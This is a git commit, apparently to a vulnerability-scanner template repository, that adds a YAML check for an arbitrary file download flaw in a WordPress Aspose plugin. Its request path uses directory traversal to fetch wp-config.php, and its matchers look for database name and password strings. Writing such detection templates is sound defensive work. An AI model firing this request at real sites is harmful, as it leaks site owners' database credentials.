Merge pull request #2953 from Akokonunes/patch-59

Create aspose-importer-exporter-file-download.yaml
2021-10-22 22:03:37 +05:30 · 2021-10-22 22:03:37 +05:30 · 9ab9cd2a25
parent bb38ee8aaa 82ca4a8c43
commit 9ab9cd2a25
1 changed files with 29 additions and 0 deletions
--- a/vulnerabilities/wordpress/aspose-ie-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml
@ -0,0 +1,29 @@
+id: aspose-ie-file-download
+
+info:
+  name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download
+  author: 0x_Akoko
+  severity: high
+  description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
+  reference:
+    - https://packetstormsecurity.com/files/131162/
+    - https://wordpress.org/plugins/aspose-importer-exporter
+  tags: wordpress,wp-plugin,lfi,aspose
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200